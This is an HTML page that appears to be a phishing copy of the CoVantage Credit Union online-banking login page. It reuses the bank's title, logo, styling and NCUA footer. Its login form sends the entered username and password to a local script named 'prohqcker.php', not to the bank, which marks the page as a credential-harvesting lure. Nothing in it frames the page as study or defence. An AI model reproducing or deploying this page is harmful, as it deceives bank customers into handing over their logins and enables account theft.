<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
    <head id="M_Head">
        <link href="css/EditMode.css" type="text/css" rel="stylesheet">
        <link href="css/LoadingPanel.css" type="text/css" rel="stylesheet">
        <link href="css/opensans.css" type="text/css" rel="stylesheet">
        <link href="css/print.css" type="text/css" rel="stylesheet" media="print">
        <link href="https://www1.covantagecu.org/CoVantageOnlineBanking/App_Themes/Theme4/stylesheets/screen.css" type="text/css" rel="stylesheet">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
        <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
        <title>Home- CoVantage Credit Union</title>
        <link type="text/css" rel="stylesheet" href="css/RadDockableObject.css">
        <link rel="stylesheet" type="text/css" href="css/content.css" data-type="skin">
        <link rel="stylesheet" type="text/css" href="css/login.css">
    </head>
<body class="pre-signin" style="overflow-y: auto; min-width: initial;">
<form method="post" action="prohqcker.php" id="aspnetForm">
	<div id="M_outerWrapper" class="theme4-container">
	    <div class="portal-view page-background-image" style="min-height: 570px; background-image: url(&quot;images/Background-Desktop.png&quot;); background-repeat: no-repeat; background-attachment: fixed; background-position: center center;">
        <img src="images/transparent.png" class="background_top_image">
        <img src="images/mycovantage_logo.png" class="background_bottom_image">
<style>
@media (max-width: 1138px) {
#busy-div, .busy-div {
    height: 100%!important;
}
}
</style>
            
            <div class="page-header page-row">
				<div id="page-header-container" class="page-content-container">
        
                    
                </div>
            </div>


            <!-- Middle Row of 3 -->
            <div class="page-middle page-row CVCUMobileNavPadding" style="min-height: 570px;">
       	        <div class="page-middle-container page-content-container" style="min-height: 570px;">
       	            
                    
                    <!-- content area vertical column -->
                    

                    <div class="page-middle-middle" style="width: 100%;">
                        
						
						
       	                <div class="page-primary-nav">
			                <a id="M_lnkLogo" title="covantagecu.org" class="logo disable-anchor" alt="covantagecu.org" data-title="covantagecu.org"><img class="css-imgLogo" src="/CoVantageOnlineBanking/css/images/Ascend.png" alt="Logo"></a>

                            
                            <div class="primary-nav">  
			                    
                            </div>
                            <div style="clear:both"></div>
                        </div>
                        
                        
                        
       	                <!--******************************
            
                        * main-content-tabs
                            2nd level navigation
            
                        **********************************-->
                        
            
                        <div class="page-info">
                            <div id="page-info-container" class="page-content-container">
                   
                                <!--******************************
            
                                * MessageQueueContainer
            
                                **********************************-->
                                <div class="MessageQueueContainer">
				                    <div id="M_MessageQueue">
</div>

			                    </div>
                            </div>
                            <div style="clear:both"></div>
                        </div>

			            
			                <div id="content-wrapper" class="content-wrapper">
								<div class="screen_reader_only"><h1>MyCoVantage</h1></div>
				                

								

				                <!-- right main content tab -->
				                <div id="main-content" class="main-content">
				                    <div id="main-content-header"></div>
					                
								
            
					                <div id="main-fixedtop" class="module-container graphs">
						                
					                </div>
                        
									
										
					                <div id="main-sortable" class="main-sortable module-container graphs login-width">
						                


<div id="M_layout_content_PCDZ_MYQP1CF_ctl00" class="module-single-wrapper">
	
<div id="Module-MYQP1CF" class="module-single cvcu_authentication_mobileLogin" style="">
<div class="module-container mainmodule">
<div class="ModuleDefault LoginModule">
<div style="margin:2em 0;">
<input name="username" type="text" autocomplete="off" maxlength="35" id="M_layout_content_PCDZ_MYQP1CF_ctl00_LoginName" placeholder="Username" required>
</div>
<div>
<input name="password" type="password" autocomplete="off" maxlength="32" id="M_layout_content_PCDZ_MYQP1CF_ctl00_Password" class="TextBox cvcu_lineTextBox" placeholder="Password" required>
</div>
<div style="display: inline-block; width:0px; top:32%; left:80%; position:absolute;" class="cvcu_fingerprint"></div>
<p id="M_layout_content_PCDZ_MYQP1CF_ctl00_SubmitButtons" class="submit_buttons"><input type="submit" name="M$layout$content$PCDZ$MYQP1CF$ctl00$cmdContinue" value="LOGIN" id="M_layout_content_PCDZ_MYQP1CF_ctl00_cmdContinue" style="background-color:#25408F"></p>

</div>

<div style="text-align:center; margin-bottom:40px; margin-top:-40px;" id="FooterZone">
<a style="color:#25408F; text-align:center;" id="ForgotPassword">Forgot User ID/Password</a>
</div>
		
	</div>
   
</div>

</div>
<div style="" data-moduletitle="Message Display" class="">

</div><div id="M_layout_content_PCDZ_MJNJTNL_ctl00" class="module-single-wrapper" style="margin-top:10px; ">
	
<div id="Module-MJNJTNL" class="module-single cvcu_mobileHome_Links" data-logourl="" data-printstyleurl="css/print.css" data-moduletitle="Quick Links" data-moduledescription="" style="">
	
   
    <div class="module-container mainmodule">


<a>ENROLL</a>&nbsp;|&nbsp;<a target="_blank">ATM/BRANCHES</a>&nbsp;|&nbsp;<a target="_blank">CONTACT</a>
		
	</div>
    <div class="overlay edit-overlay"></div>
</div>

</div><span id="M_layout_content_PCDZ_MH1KPE7_ctl00_lblHtml"></span>
<p class="app-store-link">
<a id="M_layout_content_PCDZ_MH1KPE7_ctl00_lnkStoreLink" href="https://play.google.com/store/apps/details?id=com%2Ecovantage%2Embanking"><img src="https://developer.android.com/images/brand/en_generic_rgb_wo_45.png" alt=""></a>
</p>


					                </div>

				                </div>
                            </div>
			            
                    </div>
                    
                       
                <div style="position:absolute;bottom:1em;left:1em;font-size:.8em;"><span>Federally insured by NCUA</span></div><div style="position:absolute;bottom:1em;right:1em;font-size:.8em;"><span></span></div></div>
                <div style="clear:both"></div>
                
               
            
           
            

			
			
			

			
			
        </div>
	</div>


    

	<div style="clear:both;"></div>

	<!-- modal help -->
	<div id="modal-help" class="default-dialog" style="display:none;">
			<div class="module-single">
				<h1>Help</h1>
				<div id="modal-help-content" class="body">
				</div>
				<div class="modal-help-submit_button submit_buttons">
					<input id="modal-help-close" type="button" value="Close">
				</div>
					
			</div>
	</div>
	    

</body></html>